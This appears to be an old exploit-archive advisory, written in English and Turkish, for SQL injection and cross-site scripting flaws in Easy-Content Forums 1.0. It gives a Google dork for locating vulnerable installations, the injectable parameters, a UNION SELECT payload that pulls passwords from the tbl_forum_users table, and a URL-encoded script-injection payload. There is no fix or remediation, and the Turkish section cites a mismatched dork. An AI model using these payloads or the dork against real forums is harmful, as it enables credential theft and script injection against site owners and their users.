ENGLISH

Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

Dork : "Copyright 2004 easy-content forums"

Author : ajann

Exploit;

SQL INJECTİON--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=SQL TEXT

http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=xss TEXT

http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X

ajann,Turkey

TURKISH

Başlık : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

Sцzcьk[Arama] : "powered by phpmydirectory"

Aзığı Bulan : ajann

Aзık bulunan dosyalar;

SQL INJECTİON--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ

http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken

Цrnek:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ

http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Цrnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı
cıkarıcaktır.

Acıklama:
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu
calıstırılabilmektedir.
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları
calısabilmektedir.

ajann,Turkiye